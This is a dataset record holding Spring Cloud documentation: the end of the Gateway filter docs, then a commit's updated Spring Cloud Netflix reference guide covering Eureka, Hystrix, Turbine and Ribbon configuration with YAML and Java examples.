Multiple matching segments are allowed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setpath_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n filters:\n - SetPath=\/{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request.\n\n=== SetResponseHeader WebFilter Factory\nThe SetResponseHeader WebFilter Factory takes `name` and `value` parameters.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setresponseheader_route\n uri: http:\/\/example.org\n filters:\n - SetResponseHeader=X-Response-Foo, Bar\n----\n\nThis WebFilter replaces all headers with the given name, rather than adding to them. So if the downstream server responded with an `X-Response-Foo:1234`, this would be replaced with `X-Response-Foo:Bar`, which is what the gateway client would receive.\n\n=== SetStatus WebFilter Factory\nThe SetStatus WebFilter Factory takes a single `status` parameter. It must be a valid Spring `HttpStatus`. It may be the integer value `404` or the string representation of the enumeration `NOT_FOUND`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setstatusstring_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=BAD_REQUEST\n - id: setstatusint_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=401\n----\n\nThe first route sets the HTTP status of the response to 400 (`BAD_REQUEST`), the second to 401.\n\n== Global Filters\n\nThe `GlobalFilter` interface has the same signature as `WebFilter`. These are special filters that are conditionally applied to all routes. (This interface and usage are subject to change in future milestones.)\n\n=== LoadBalancerClient Filter\n\nThe `LoadBalancerClientFilter` looks for a URI in the exchange attribute `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR`. If the URL has an `lb` scheme (i.e. `lb:\/\/myservice`), it will use the Spring Cloud `LoadBalancerClient` to resolve the name (`myservice` in the previous example) to an actual host and port and replace the URI in the same attribute. The unmodified original URL is placed in the `ServerWebExchangeUtils.GATEWAY_ORIGINAL_REQUEST_URL_ATTR` attribute.\n\n=== Netty Routing Filter\n\nThe Netty Routing Filter runs if the URL located in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute has an `http` or `https` scheme. It uses the Netty `HttpClient` to make the downstream proxy request. The response is put in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute for use in a later filter. (There is an experimental `WebClientHttpRoutingFilter` that performs the same function, but does not require Netty.)\n\n=== Netty Write Response Filter\n\nThe `NettyWriteResponseFilter` runs if there is a Netty `HttpClientResponse` in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute. It is run after all other filters have completed and writes the proxy response back to the gateway client response. (There is an experimental `WebClientWriteResponseFilter` that performs the same function, but does not require Netty.)\n\n=== RouteToRequestUrl Filter\n\nThe `RouteToRequestUrlFilter` runs if there is a `Route` object in the `ServerWebExchangeUtils.GATEWAY_ROUTE_ATTR` exchange attribute.
","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cf581d4964bc67d1d4fa3a89cff8e63aa02697c","subject":"Correct description of cloud foundry instance id","message":"Correct description of cloud foundry instance id\n\nFixes
gh-1214\n","repos":"joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,sfat\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-netflix\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n= Spring Cloud Netflix\n\ninclude::intro.adoc[]\n\n== Service Discovery: Eureka Clients\n\nService Discovery is one of the key tenets of a microservice-based architecture. Hand-configuring each client, or relying on some form of convention, can be very difficult to do and can be very brittle. Eureka is the Netflix Service Discovery Server and Client. The server can be configured and deployed to be highly available, with each server replicating state about the registered services to the others.\n\n=== Registering with Eureka\n\nWhen a client registers with Eureka, it provides metadata about itself\nsuch as host and port, health indicator URL, home page etc. Eureka\nreceives heartbeat messages from each instance belonging to a service.\nIf the heartbeat fails for longer than a configurable period, the\ninstance is normally removed from the registry.\n\nExample Eureka client:\n\n[source,java,indent=0]\n----\n@Configuration\n@ComponentScan\n@EnableAutoConfiguration\n@EnableEurekaClient\n@RestController\npublic class Application {\n\n @RequestMapping(\"\/\")\n public String home() {\n return \"Hello world\";\n }\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n----\n\n(i.e. an utterly normal Spring Boot app). In this example we use\n`@EnableEurekaClient` explicitly, but with only Eureka available you\ncould also use `@EnableDiscoveryClient`. Configuration is required to\nlocate the Eureka server. Example:\n\n\n.application.yml\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/localhost:8761\/eureka\/\n----\n\nwhere \"defaultZone\" is a magic string fallback value that provides the\nservice URL for any client that doesn't express a preference\n(i.e.
it's a useful default).\n\nThe default application name (service ID), virtual host and non-secure\nport, taken from the `Environment`, are `${spring.application.name}`,\n`${spring.application.name}` and `${server.port}` respectively.\n\n`@EnableEurekaClient` makes the app into both a Eureka \"instance\"\n(i.e. it registers itself) and a \"client\" (i.e. it can query the\nregistry to locate other services). The instance behaviour is driven\nby `eureka.instance.*` configuration keys, but the defaults will be\nfine if you ensure that your application has a\n`spring.application.name` (this is the default for the Eureka service\nID, or VIP).\n\nSee {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] and {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaClientConfigBean.java[EurekaClientConfigBean] for more details of the configurable options.\n\n=== Authenticating with the Eureka Server\n\nHTTP basic authentication will be automatically added to your eureka\nclient if one of the `eureka.client.serviceUrl.defaultZone` URLs has\ncredentials embedded in it (curl style, like\n`http:\/\/user:password@localhost:8761\/eureka`). For more complex needs\nyou can create a `@Bean` of type `DiscoveryClientOptionalArgs` and\ninject `ClientFilter` instances into it, all of which will be applied\nto the calls from the client to the server.\n\nNOTE: Because of a limitation in Eureka it isn't possible to support\nper-server basic auth credentials, so only the first set that are\nfound will be used.\n\n=== Status Page and Health Indicator\n\nThe status page and health indicators for a Eureka instance default to\n\"\/info\" and \"\/health\" respectively, which are the default locations of\nuseful endpoints in a Spring Boot Actuator application. You need to\nchange these, even for an Actuator application if you use a\nnon-default context path or servlet path\n(e.g. `server.servletPath=\/foo`) or management endpoint path\n(e.g. `management.contextPath=\/admin`). Example:\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrlPath: ${management.context-path}\/info\n healthCheckUrlPath: ${management.context-path}\/health\n----\n\nThese links show up in the metadata that is consumed by clients, and\nused in some scenarios to decide whether to send requests to your\napplication, so it's helpful if they are accurate.\n\n=== Registering a Secure Application\n\nIf your app wants to be contacted over HTTPS you can set two flags in\nthe `EurekaInstanceConfig`, _viz_\n`eureka.instance.[nonSecurePortEnabled,securePortEnabled]=[false,true]`\nrespectively. This will make Eureka publish instance information\nshowing an explicit preference for secure communication. The Spring\nCloud `DiscoveryClient` will always return an `https:\/\/...` URI for a\nservice configured this way, and the Eureka (native) instance\ninformation will have a secure health check URL. 
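\n\nFor example, the two flags can be set in YAML along these lines (a minimal sketch, not from the original text; Spring Boot's relaxed binding of the `EurekaInstanceConfig` keys named above is assumed):\n\n.application.yml\n----\neureka:\n instance:\n nonSecurePortEnabled: false\n securePortEnabled: true\n----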
\n\nBecause of the way\nEureka works internally, it will still publish a non-secure URL for\nstatus and home page unless you also override those explicitly.\nYou can use placeholders to configure the Eureka instance URLs,\ne.g.\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrl: https:\/\/${eureka.hostname}\/info\n healthCheckUrl: https:\/\/${eureka.hostname}\/health\n homePageUrl: https:\/\/${eureka.hostname}\/\n----\n\n(Note that `${eureka.hostname}` is a native placeholder only available\nin later versions of Eureka. You could achieve the same thing with\nSpring placeholders as well, e.g. using `${eureka.instance.hostName}`.)\n\nNOTE: If your app is running behind a proxy, and the SSL termination\nis in the proxy (e.g. if you run in Cloud Foundry or other platforms\nas a service) then you will need to ensure that the proxy \"forwarded\"\nheaders are intercepted and handled by the application. An embedded\nTomcat container in a Spring Boot app does this automatically if it\nhas explicit configuration for the `X-Forwarded-\\*` headers. A sign\nthat you got this wrong will be that the links rendered by your app to\nitself will be wrong (the wrong host, port or protocol).\n\n=== Eureka's Health Checks\n\nBy default, Eureka uses the client heartbeat to determine if a client is up.\nUnless specified otherwise, the Discovery Client will not propagate the\ncurrent health check status of the application, per the Spring Boot Actuator. This means\nthat after successful registration Eureka will always announce that the\napplication is in the 'UP' state. This behaviour can be altered by enabling\nEureka health checks, which results in propagating application status\nto Eureka. As a consequence, other applications won't send\ntraffic to an application in any state other than 'UP'.\n\n.application.yml\n----\neureka:\n client:\n healthcheck:\n enabled: true\n----\n\nIf you require more control over the health checks, you may consider\nimplementing your own `com.netflix.appinfo.HealthCheckHandler`.\n\n=== Eureka Metadata for Instances and Clients\n\nIt's worth spending a bit of time understanding how the Eureka metadata works, so you can use it in a way that makes sense in your platform. There is standard metadata for things like hostname, IP address, port numbers, status page and health check. These are published in the service registry and used by clients to contact the services in a straightforward way. Additional metadata can be added to the instance registration in the `eureka.instance.metadataMap`, and this will be accessible in the remote clients, but in general will not change the behaviour of the client, unless it is made aware of the meaning of the metadata. There are a couple of special cases described below where Spring Cloud already assigns meaning to the metadata map.\n\n==== Using Eureka on Cloudfoundry\n\nCloudfoundry has a global router so that all instances of the same app have the same hostname (it's the same in other PaaS solutions with a similar architecture). This isn't necessarily a barrier to using Eureka, but if you use the router (recommended, or even mandatory depending on the way your platform was set up), you need to explicitly set the hostname and port numbers (secure or non-secure) so that they use the router. You might also want to use instance metadata so you can distinguish between the instances on the client (e.g. in a custom load balancer). By default, the `eureka.instance.instanceId` is `vcap.application.instance_id`.
For example:\n\n.application.yml\n----\neureka:\n instance:\n hostname: ${vcap.application.uris[0]}\n nonSecurePort: 80\n----\n\nDepending on the way the security rules are set up in your Cloudfoundry instance, you might be able to register and use the IP address of the host VM for direct service-to-service calls. This feature is not (yet) available on Pivotal Web Services (https:\/\/run.pivotal.io[PWS]).\n\n==== Using Eureka on AWS\n\nIf the application is to be deployed to an AWS cloud, the Eureka instance must be configured to be Amazon-aware. This can be done by customizing the {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] as follows:\n\n[source,java,indent=0]\n----\n@Bean\n@Profile(\"!default\")\npublic EurekaInstanceConfigBean eurekaInstanceConfig() {\n EurekaInstanceConfigBean b = new EurekaInstanceConfigBean();\n AmazonInfo info = AmazonInfo.Builder.newBuilder().autoBuild(\"eureka\");\n b.setDataCenterInfo(info);\n return b;\n}\n----\n\n==== Changing the Eureka Instance ID\n\nA vanilla Netflix Eureka instance is registered with an ID that is equal to its host name (i.e. only one service per host). Spring Cloud Eureka provides a sensible default that looks like this: `${spring.cloud.client.hostname}:${spring.application.name}:${spring.application.instance_id:${server.port}}`. For example: `myhost:myappname:8080`.\n\nUsing Spring Cloud, you can override this by providing a unique identifier in `eureka.instance.instanceId`. For example:\n\n.application.yml\n----\neureka:\n instance:\n instanceId: ${spring.application.name}:${vcap.application.instance_id:${spring.application.instance_id:${random.value}}}\n----\n\nWith this metadata, and multiple service instances deployed on\nlocalhost, the random value will kick in there to make the instance\nunique. In Cloudfoundry the `vcap.application.instance_id` will be\npopulated automatically in a Spring Boot application, so the\nrandom value will not be needed.\n\n=== Using the EurekaClient\n\nOnce you have an app that is `@EnableDiscoveryClient` (or `@EnableEurekaClient`), you can use it to\ndiscover service instances from the <<spring-cloud-eureka-server,\nEureka Server>>. One way to do that is to use the native\n`com.netflix.discovery.EurekaClient` (as opposed to the Spring\nCloud `DiscoveryClient`), e.g.\n\n----\n@Autowired\nprivate EurekaClient discoveryClient;\n\npublic String serviceUrl() {\n InstanceInfo instance = discoveryClient.getNextServerFromEureka(\"STORES\", false);\n return instance.getHomePageUrl();\n}\n----\n\n[TIP]\n====\nDon't use the `EurekaClient` in a `@PostConstruct` method or in a\n`@Scheduled` method (or anywhere where the `ApplicationContext` might\nnot be started yet). It is initialized in a `SmartLifecycle` (with\n`phase=0`) so the earliest you can rely on it being available is in\nanother `SmartLifecycle` with a higher phase.\n====\n\n=== Alternatives to the native Netflix EurekaClient\n\nYou don't have to use the raw Netflix `EurekaClient` and usually it\nis more convenient to use it behind a wrapper of some sort. Spring\nCloud has support for <<spring-cloud-feign, Feign>> (a REST client\nbuilder) and also <<spring-cloud-ribbon, Spring `RestTemplate`>> using\nthe logical Eureka service identifiers (VIPs) instead of physical\nURLs.
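\n\nFor instance, a load-balanced `RestTemplate` can address the \"stores\" service by its logical name. This is a sketch, not from the original text: it assumes the `@LoadBalanced` qualifier from Spring Cloud Commons, and the service ID and path are illustrative.\n\n[source,java,indent=0]\n----\n@Bean\n@LoadBalanced \/\/ marks this RestTemplate to resolve service ids via Ribbon\nRestTemplate restTemplate() {\n return new RestTemplate();\n}\n\n\/\/ elsewhere: \"stores\" is resolved to a real host and port at call time\nString body = restTemplate.getForObject(\"http:\/\/stores\/stores\", String.class);\n----\n\n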
To configure Ribbon with a fixed list of physical servers, you\ncan simply set `<client>.ribbon.listOfServers` to a comma-separated\nlist of physical addresses (or hostnames), where `<client>` is the ID\nof the client.\n\nYou can also use the `org.springframework.cloud.client.discovery.DiscoveryClient`\nwhich provides a simple API for discovery clients that is not specific\nto Netflix, e.g.\n\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n\npublic String serviceUrl() {\n List<ServiceInstance> list = discoveryClient.getInstances(\"STORES\");\n if (list != null && list.size() > 0) {\n return list.get(0).getUri().toString();\n }\n return null;\n}\n----\n\n=== Why is it so Slow to Register a Service?\n\nBeing an instance also involves a periodic heartbeat to the registry\n(via the client's `serviceUrl`) with a default duration of 30 seconds. A\nservice is not available for discovery by clients until the instance,\nthe server and the client all have the same metadata in their local\ncache (so it could take 3 heartbeats). You can change the period using\n`eureka.instance.leaseRenewalIntervalInSeconds` and this will speed up\nthe process of getting clients connected to other services. In\nproduction it's probably better to stick with the default because\nthere are some computations internally in the server that make\nassumptions about the lease renewal period.\n\n[[spring-cloud-eureka-server]]\n== Service Discovery: Eureka Server\n\nExample Eureka server (e.g. using spring-cloud-starter-eureka-server to set up the classpath):\n\n[source,java,indent=0]\n----\n@SpringBootApplication\n@EnableEurekaServer\npublic class Application {\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n----\n\nThe server has a home page with a UI, and HTTP API endpoints per the\nnormal Eureka functionality under `\/eureka\/*`.\n\nEureka background reading: see https:\/\/github.com\/cfregly\/fluxcapacitor\/wiki\/NetflixOSS-FAQ#eureka-service-discovery-load-balancer[flux capacitor] and https:\/\/groups.google.com\/forum\/?fromgroups#!topic\/eureka_netflix\/g3p2r7gHnN0[google group discussion].\n\n\n[TIP]\n====\nDue to Gradle's dependency resolution rules and the lack of a parent bom feature, simply depending on spring-cloud-starter-eureka-server can cause failures on application startup. To remedy this, the Spring Boot Gradle plugin must be added and the Spring Cloud starter parent bom must be imported like so:\n\n.build.gradle\n[source,java,indent=0]\n----\nbuildscript {\n dependencies {\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:1.3.5.RELEASE\")\n }\n}\n\napply plugin: \"spring-boot\"\n\ndependencyManagement {\n imports {\n mavenBom \"org.springframework.cloud:spring-cloud-dependencies:Brixton.RELEASE\"\n }\n}\n----\n====\n\n=== High Availability, Zones and Regions\n\nThe Eureka server does not have a backend store, but the service\ninstances in the registry all have to send heartbeats to keep their\nregistrations up to date (so this can be done in memory). Clients also\nhave an in-memory cache of Eureka registrations (so they don't have to\ngo to the registry for every single request to a service).\n\nBy default, every Eureka server is also a Eureka client and requires\n(at least one) service URL to locate a peer.
If you don't provide it,\nthe service will run and work, but it will shower your logs with a lot\nof noise about not being able to register with the peer.\n\nSee also <<spring-cloud-ribbon,below for details of Ribbon\nsupport>> on the client side for Zones and Regions.\n\n=== Standalone Mode\n\nThe combination of the two caches (client and server) and the\nheartbeats makes a standalone Eureka server fairly resilient to\nfailure, as long as there is some sort of monitor or elastic runtime\nkeeping it alive (e.g. Cloud Foundry). In standalone mode, you might\nprefer to switch off the client side behaviour, so it doesn't keep\ntrying and failing to reach its peers. Example:\n\n.application.yml (Standalone Eureka Server)\n----\nserver:\n port: 8761\n\neureka:\n instance:\n hostname: localhost\n client:\n registerWithEureka: false\n fetchRegistry: false\n serviceUrl:\n defaultZone: http:\/\/${eureka.instance.hostname}:${server.port}\/eureka\/\n----\n\nNotice that the `serviceUrl` is pointing to the same host as the local\ninstance.\n\n=== Peer Awareness\n\nEureka can be made even more resilient and available by running\nmultiple instances and asking them to register with each other. In\nfact, this is the default behaviour, so all you need to do to make it\nwork is add a valid `serviceUrl` to a peer, e.g.\n\n.application.yml (Two Peer Aware Eureka Servers)\n----\n\n---\nspring:\n profiles: peer1\neureka:\n instance:\n hostname: peer1\n client:\n serviceUrl:\n defaultZone: http:\/\/peer2\/eureka\/\n\n---\nspring:\n profiles: peer2\neureka:\n instance:\n hostname: peer2\n client:\n serviceUrl:\n defaultZone: http:\/\/peer1\/eureka\/\n----\n\nIn this example we have a YAML file that can be used to run the same\nserver on 2 hosts (peer1 and peer2), by running it in different\nSpring profiles. You could use this configuration to test the peer\nawareness on a single host (there's not much value in doing that in\nproduction) by manipulating `\/etc\/hosts` to resolve the host names. In\nfact, the `eureka.instance.hostname` is not needed if you are running\non a machine that knows its own hostname (it is looked up using\n`java.net.InetAddress` by default).\n\nYou can add multiple peers to a system, and as long as they are all\nconnected to each other by at least one edge, they will synchronize\nthe registrations amongst themselves. If the peers are physically\nseparated (inside a data centre or between multiple data centres) then\nthe system can in principle survive split-brain type failures.\n\n=== Prefer IP Address\n\nIn some cases, it is preferable for Eureka to advertise the IP addresses\nof services rather than the hostname. Set `eureka.instance.preferIpAddress`\nto `true` and when the application registers with Eureka, it will use its\nIP address rather than its hostname.\n\n== Circuit Breaker: Hystrix Clients\n\nNetflix has created a library called https:\/\/github.com\/Netflix\/Hystrix[Hystrix] that implements the http:\/\/martinfowler.com\/bliki\/CircuitBreaker.html[circuit breaker pattern]. In a microservice architecture, it is common to have multiple layers of service calls.\n\n.Microservice Graph\nimage::HystrixGraph.png[]\n\nA service failure in the lower level of services can cause cascading failure all the way up to the user. When calls to a particular service reach a certain threshold (20 failures in 5 seconds is the default in Hystrix), the circuit opens and the call is not made.
In cases of error and an open circuit, a fallback can be provided by the developer.\n\n.Hystrix fallback prevents cascading failures\nimage::HystrixFallback.png[]\n\nHaving an open circuit stops cascading failures and allows overwhelmed or failing services time to heal. The fallback can be another Hystrix-protected call, static data, or a sane empty value. Fallbacks may be chained, so the first fallback makes some other business call, which in turn falls back to static data.\n\nExample boot app:\n\n----\n@SpringBootApplication\n@EnableCircuitBreaker\npublic class Application {\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n\n@Component\npublic class StoreIntegration {\n\n @HystrixCommand(fallbackMethod = \"defaultStores\")\n public Object getStores(Map<String, Object> parameters) {\n \/\/do stuff that might fail\n }\n\n public Object defaultStores(Map<String, Object> parameters) {\n return \/* something useful *\/;\n }\n}\n\n----\n\nThe `@HystrixCommand` is provided by a Netflix contrib library called\nhttps:\/\/github.com\/Netflix\/Hystrix\/tree\/master\/hystrix-contrib\/hystrix-javanica[\"javanica\"].\nSpring Cloud automatically wraps Spring beans with that\nannotation in a proxy that is connected to the Hystrix circuit\nbreaker. The circuit breaker calculates when to open and close the\ncircuit, and what to do in case of a failure.\n\nTo configure the `@HystrixCommand` you can use the `commandProperties`\nattribute with a list of `@HystrixProperty` annotations. See\nhttps:\/\/github.com\/Netflix\/Hystrix\/tree\/master\/hystrix-contrib\/hystrix-javanica#configuration[here]\nfor more details. See the https:\/\/github.com\/Netflix\/Hystrix\/wiki\/Configuration[Hystrix wiki]\nfor details on the properties available.\n\n=== Propagating the Security Context or using Spring Scopes\n\nIf you want some thread-local context to propagate into a `@HystrixCommand`, the default declaration will not work because it executes the command in a thread pool (in case of timeouts). You can switch Hystrix to use the same thread as the caller using some configuration, or directly in the annotation, by asking it to use a different \"Isolation Strategy\". For example:\n\n[source,java]\n----\n@HystrixCommand(fallbackMethod = \"stubMyService\",\n commandProperties = {\n @HystrixProperty(name=\"execution.isolation.strategy\", value=\"SEMAPHORE\")\n }\n)\n...\n----\n\nThe same thing applies if you are using `@SessionScope` or `@RequestScope`. You will know when you need to do this because of a runtime exception that says it can't find the scoped context.\n\n=== Health Indicator\n\nThe state of the connected circuit breakers is also exposed in the\n`\/health` endpoint of the calling application.\n\n[source,json,indent=0]\n----\n{\n \"hystrix\": {\n \"openCircuitBreakers\": [\n \"StoreIntegration::getStoresByLocationLink\"\n ],\n \"status\": \"CIRCUIT_OPEN\"\n },\n \"status\": \"UP\"\n}\n----\n\n=== Hystrix Metrics Stream\n\nTo enable the Hystrix metrics stream, include a dependency on `spring-boot-starter-actuator`. This will expose the `\/hystrix.stream` as a management endpoint.\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n <\/dependency>\n----\n\n== Circuit Breaker: Hystrix Dashboard\n\nOne of the main benefits of Hystrix is the set of metrics it gathers about each HystrixCommand.
The Hystrix Dashboard displays the health of each circuit breaker in an efficient manner.\n\n.Hystrix Dashboard\nimage::Hystrix.png[]\n\nTo run the Hystrix Dashboard, annotate your Spring Boot main class with `@EnableHystrixDashboard`. You then visit `\/hystrix` and point the dashboard to an individual instance's `\/hystrix.stream` endpoint in a Hystrix client application.\n\n=== Turbine\n\nLooking at an individual instance's Hystrix data is not very useful in terms of the overall health of the system. https:\/\/github.com\/Netflix\/Turbine[Turbine] is an application that aggregates all of the relevant `\/hystrix.stream` endpoints into a combined `\/turbine.stream` for use in the Hystrix Dashboard. Individual instances are located via Eureka. Running Turbine is as simple as annotating your main class with the `@EnableTurbine` annotation (e.g. using spring-cloud-starter-turbine to set up the classpath). All of the documented configuration properties from https:\/\/github.com\/Netflix\/Turbine\/wiki\/Configuration-(1.x)[the Turbine 1 wiki] apply. The only difference is that the `turbine.instanceUrlSuffix` does not need the port prepended as this is handled automatically unless `turbine.instanceInsertPort=false`.\n\nThe configuration key `turbine.appConfig` is a list of Eureka serviceIds that Turbine will use to look up instances. The turbine stream is then used in the Hystrix dashboard using a URL that looks like: `http:\/\/my.turbine.server:8080\/turbine.stream?cluster=<CLUSTERNAME>` (the cluster parameter can be omitted if the name is \"default\"). The `cluster` parameter must match an entry in `turbine.aggregator.clusterConfig`. Values returned from Eureka are uppercase, thus we expect this example to work if there is an app registered with Eureka called \"customers\":\n\n----\nturbine:\n aggregator:\n clusterConfig: CUSTOMERS\n appConfig: customers\n----\n\nThe `clusterName` can be customized by a SpEL expression in `turbine.clusterNameExpression`, with the root being an instance of `InstanceInfo`. The default value is `appName`, which means that the Eureka serviceId ends up as the cluster key (i.e. the `InstanceInfo` for customers has an `appName` of \"CUSTOMERS\"). A different example would be `turbine.clusterNameExpression=aSGName`, which would get the cluster name from the AWS ASG name. Another example:\n\n----\nturbine:\n aggregator:\n clusterConfig: SYSTEM,USER\n appConfig: customers,stores,ui,admin\n clusterNameExpression: metadata['cluster']\n----\n\nIn this case, the cluster name from 4 services is pulled from their metadata map, and is expected to have values that include \"SYSTEM\" and \"USER\".\n\nTo use the \"default\" cluster for all apps, you need a string literal expression (with single quotes, and escaped with double quotes if it is in YAML as well):\n\n----\nturbine:\n appConfig: customers,stores\n clusterNameExpression: \"'default'\"\n----\n\nSpring Cloud provides a `spring-cloud-starter-turbine` that has all the dependencies you need to get a Turbine server running. Just create a Spring Boot application and annotate it with `@EnableTurbine`.\n\nNOTE: By default, Spring Cloud allows Turbine to use the host and port to allow multiple processes per host, per cluster. If you want the native Netflix behaviour built into Turbine that does _not_ allow multiple processes per host, per cluster (the key to the instance id is the hostname), then set the property `turbine.combineHostPort=false`.\n\n=== Turbine Stream\n\nIn some environments (e.g.
in a PaaS setting), the classic Turbine model of pulling metrics from all the distributed Hystrix commands doesn't work. In that case, you might want to have your Hystrix commands push metrics to Turbine, and Spring Cloud enables that with messaging. All you need to do on the client is add a dependency to `spring-cloud-netflix-hystrix-stream` and the `spring-cloud-starter-stream-*` of your choice (see Spring Cloud Stream documentation for details on the brokers, and how to configure the client credentials, but it should work out of the box for a local broker).\n\nOn the server side, just create a Spring Boot application and annotate it with `@EnableTurbineStream`; by default it will come up on port 8989 (point your Hystrix dashboard to that port, any path). You can customize the port using either `server.port` or `turbine.stream.port`. If you have `spring-boot-starter-web` and `spring-boot-starter-actuator` on the classpath as well, then you can open up the Actuator endpoints on a separate port (with Tomcat by default) by providing a different `management.port`.\n\nYou can then point the Hystrix Dashboard to the Turbine Stream Server instead of individual Hystrix streams. If Turbine Stream is running on port 8989 on myhost, then put `http:\/\/myhost:8989` in the stream input field in the Hystrix Dashboard. Circuits will be prefixed by their respective serviceId, followed by a dot, then the circuit name.\n\nSpring Cloud provides a `spring-cloud-starter-turbine-stream` that has all the dependencies you need to get a Turbine Stream server running - just add the Stream binder of your choice, e.g. `spring-cloud-starter-stream-rabbit`. You need Java 8 to run the app because it is Netty-based.\n\n[[spring-cloud-ribbon]]\n== Client Side Load Balancer: Ribbon\n\nRibbon is a client-side load balancer which gives you a lot of control\nover the behaviour of HTTP and TCP clients. Feign already uses Ribbon,\nso if you are using `@FeignClient` then this section also applies.\n\nA central concept in Ribbon is that of the named client. Each load\nbalancer is part of an ensemble of components that work together to\ncontact a remote server on demand, and the ensemble has a name that\nyou give it as an application developer (e.g. using the `@FeignClient`\nannotation). Spring Cloud creates a new ensemble as an\n`ApplicationContext` on demand for each named client using\n`RibbonClientConfiguration`. This contains (amongst other things) an\n`ILoadBalancer`, a `RestClient`, and a `ServerListFilter`.\n\n=== Customizing the Ribbon Client\n\nYou can configure some bits of a Ribbon client using external\nproperties in `<client>.ribbon.*`, which is no different from using\nthe Netflix APIs natively, except that you can use Spring Boot\nconfiguration files. The native options can\nbe inspected as static fields in `CommonClientConfigKey` (part of\nribbon-core).\n\nSpring Cloud also lets you take full control of the client by\ndeclaring additional configuration (on top of the\n`RibbonClientConfiguration`) using `@RibbonClient`.
Example:\n\n[source,java,indent=0]\n----\n@Configuration\n@RibbonClient(name = \"foo\", configuration = FooConfiguration.class)\npublic class TestConfiguration {\n}\n----\n\nIn this case the client is composed from the components already in\n`RibbonClientConfiguration` together with any in `FooConfiguration`\n(where the latter generally will override the former).\n\nWARNING: The `FooConfiguration` has to be `@Configuration` but take\ncare that it is not in a `@ComponentScan` for the main application\ncontext, otherwise it will be shared by all the `@RibbonClients`. If\nyou use `@ComponentScan` (or `@SpringBootApplication`) you need to\ntake steps to avoid it being included (for instance put it in a\nseparate, non-overlapping package, or specify the packages to scan\nexplicitly in the `@ComponentScan`).\n\nSpring Cloud Netflix provides the following beans by default for Ribbon\n(`BeanType` beanName: `ClassName`):\n\n* `IClientConfig` ribbonClientConfig: `DefaultClientConfigImpl`\n* `IRule` ribbonRule: `ZoneAvoidanceRule`\n* `IPing` ribbonPing: `NoOpPing`\n* `ServerList<Server>` ribbonServerList: `ConfigurationBasedServerList`\n* `ServerListFilter<Server>` ribbonServerListFilter: `ZonePreferenceServerListFilter`\n* `ILoadBalancer` ribbonLoadBalancer: `ZoneAwareLoadBalancer`\n\nCreating a bean of one of those types and placing it in a `@RibbonClient`\nconfiguration (such as `FooConfiguration` above) allows you to override each\none of the beans described. Example:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n public IPing ribbonPing(IClientConfig config) {\n return new PingUrl();\n }\n}\n----\n\nThis replaces the `NoOpPing` with `PingUrl`.\n\n=== Using Ribbon with Eureka\n\nWhen Eureka is used in conjunction with Ribbon, the `ribbonServerList`\nis overridden with an extension of 